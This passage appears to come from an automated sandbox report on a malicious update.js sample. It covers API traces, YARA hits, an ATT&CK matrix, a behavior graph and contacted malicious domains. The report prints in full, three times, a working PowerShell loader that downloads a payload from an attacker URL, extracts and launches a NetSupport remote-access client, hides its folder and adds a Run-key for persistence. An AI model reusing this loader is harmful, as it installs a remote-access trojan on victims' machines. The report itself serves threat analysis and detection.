                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,13_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,13_2_1117D104
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,13_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,13_2_11031780
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11162BB7

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 79.141.163.131 443Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,13_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11113190 GetKeyState,DeviceIoControl,keybd_event,13_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hsfb='https://roadrunnersell.com/trade/d.php?5517';$mayubqexzzv=(new-object system.net.webclient).downloadstring($hsfb);$jchvybqiuc=[system.convert]::frombase64string($mayubqexzzv);$asd = get-random -minimum -5 -maximum 12; $kdrzcqqaxe=[system.environment]::getfolderpath('applicationdata')+'\hhiahyow'+$asd;if (!(test-path $kdrzcqqaxe -pathtype container)) { new-item -path $kdrzcqqaxe -itemtype directory };$p=join-path $kdrzcqqaxe 'cxcc.zip';[system.io.file]::writeallbytes($p,$jchvybqiuc);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$kdrzcqqaxe)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $kdrzcqqaxe 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $kdrzcqqaxe -force; $fd.attributes='hidden';$s=$kdrzcqqaxe+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='wzzcvtpaz';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hsfb='https://roadrunnersell.com/trade/d.php?5517';$mayubqexzzv=(new-object system.net.webclient).downloadstring($hsfb);$jchvybqiuc=[system.convert]::frombase64string($mayubqexzzv);$asd = get-random -minimum -5 -maximum 12; $kdrzcqqaxe=[system.environment]::getfolderpath('applicationdata')+'\hhiahyow'+$asd;if (!(test-path $kdrzcqqaxe -pathtype container)) { new-item -path $kdrzcqqaxe -itemtype directory };$p=join-path $kdrzcqqaxe 'cxcc.zip';[system.io.file]::writeallbytes($p,$jchvybqiuc);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$kdrzcqqaxe)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $kdrzcqqaxe 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $kdrzcqqaxe -force; $fd.attributes='hidden';$s=$kdrzcqqaxe+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='wzzcvtpaz';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,13_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,13_2_1109ED30
                                Source: client32.exeBinary or memory string: Shell_TrayWnd
                                Source: client32.exeBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,13_2_11174898
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,13_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: GetLocaleInfoA,13_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,13_2_11174796
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,13_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,13_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,13_2_11174A69
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,13_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,13_2_11134830
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11147160 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,13_2_11147160
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,13_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,13_2_11145C70
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,13_2_11070430
                                Source: Yara matchFile source: 13.2.client32.exe.74360000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.73de0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.client32.exe.9f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.powershell.exe.1c0e60a24c0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.powershell.exe.1c0e60ac710.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.powershell.exe.1c0e608bc20.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.6cb60000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.1597848713.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1694167598.000001C0E609F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1694167598.000001C0E6081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2636997048.00000000009F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1694167598.000001C0E61D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2728193047.000000006CBA0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1694167598.000001C0E60AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1694167598.000001C0E5E6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information12
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		12
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		21
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		11
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts1
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS35
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		14
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts2
                                Service Execution                                		1
                                Registry Run Keys / Startup Folder                                		113
                                Process Injection                                		1
                                Masquerading                                		LSA Secrets141
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media3
                                PowerShell                                		RC Scripts1
                                Registry Run Keys / Startup Folder                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                Virtualization/Sandbox Evasion                                		DCSync31
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                                Access Token Manipulation                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt113
                                Process Injection                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518513 Sample: update.js Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 34 roadrunnersell.com 2->34 36 geo.netsupportsoftware.com 2->36 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 7 other signatures 2->54 8 wscript.exe 1 7 2->8         started        12 wscript.exe 6 2->12         started        14 wscript.exe 2->14         started        signatures3 process4 dnsIp5 42 roadrunnersell.com 79.141.163.131, 443, 49704, 49705 HZ-US-ASBG Bulgaria 8->42 62 Suspicious powershell command line found 8->62 64 Wscript starts Powershell (via cmd or directly) 8->64 66 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->66 68 Suspicious execution chain found 8->68 16 powershell.exe 15 36 8->16         started        70 System process connects to network (likely due to code injection or exploit) 12->70 signatures6 process7 file8 26 C:\Users\user\AppData\...\remcmdstub.exe, PE32 16->26 dropped 28 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 16->28 dropped 30 C:\Users\user\AppData\...\client32.exe, PE32 16->30 dropped 32 6 other files (5 malicious) 16->32 dropped 44 Found suspicious powershell code related to unpacking or dynamic code loading 16->44 46 Powershell drops PE file 16->46 20 client32.exe 17 16->20         started        24 conhost.exe 16->24         started        signatures9 process10 dnsIp11 38 5.181.159.137, 443, 49706 MIVOCLOUDMD Moldova Republic of 20->38 40 geo.netsupportsoftware.com 104.26.1.231, 49707, 80 CLOUDFLARENETUS United States 20->40 56 Multi AV Scanner detection for dropped file 20->56 58 Contains functionalty to change the wallpaper 20->58 60 Delayed program exit found 20->60 signatures12

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                No Antivirus matches

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL13%ReversingLabsWin32.Trojan.Generic
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL5%ReversingLabs
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL17%ReversingLabs
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL6%ReversingLabs
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe27%ReversingLabsWin32.Trojan.NetSupport
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dll0%ReversingLabs
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dll3%ReversingLabs
                                C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exe24%ReversingLabsWin32.Trojan.Generic

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p0%Avira URL Cloudsafe
                                https://github.com/apache/incubator-echarts/issues/113690%Avira URL Cloudsafe
                                https://www.google.com/intl/en-US/chrome/blank.html0%Avira URL Cloudsafe
                                http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                                https://roadrunnersell.com/trade/d.php?5517100%Avira URL Cloudmalware
                                https://www-googleapis-staging.sandbox.google.comHlY0%Avira URL Cloudsafe
                                https://www-googleapis-staging.sandbox.google.comX0%Avira URL Cloudsafe
                                https://roadrunnersell.com/100%Avira URL Cloudmalware
                                https://roadrunnersell.com/9100%Avira URL Cloudmalware
                                http://geo.netsupportsoftware.com/location/loca.asp0%Avira URL Cloudsafe
                                https://github.com/apache/echarts/issues/142660%Avira URL Cloudsafe
                                http://5.181.159.137/fakeurl.htm0%Avira URL Cloudsafe
                                http://127.0.0.10%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js0%Avira URL Cloudsafe
                                https://jsperf.com/try-catch-performance-overhead0%Avira URL Cloudsafe
                                http://0.30000000000000004.com/0%Avira URL Cloudsafe
                                https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
                                https://momentjs.com/0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/Variable1CompositeOperatio0%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js0%Avira URL Cloudsafe
                                https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight0%Avira URL Cloudsafe
                                https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)0%Avira URL Cloudsafe
                                https://www-googleapis-staging.sandbox.google.com(d0%Avira URL Cloudsafe
                                https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf0%Avira URL Cloudsafe
                                https://github.com/apache/incubator-echarts/issues/122290%Avira URL Cloudsafe
                                https://roadrunnersell.com/trade/fix.php?532d100%Avira URL Cloudmalware
                                https://github.com/ecomfe/zrender/blob/master/LICENSE.txt0%Avira URL Cloudsafe
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe
                                https://www-googleapis-staging.sandbox.google.com0%Avira URL Cloudsafe
                                https://roadrunnersell.com/trade/fix.php?532100%Avira URL Cloudmalware
                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js0%Avira URL Cloudsafe
                                https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.1.231
                                		truefalse
                                  		unknown
                                  roadrunnersell.com
                                  		79.141.163.131
                                  		truetrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://roadrunnersell.com/trade/d.php?5517true
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://5.181.159.137/fakeurl.htmtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://roadrunnersell.com/trade/fix.php?532true
                                    • Avira URL Cloud: malware
                                    		unknown

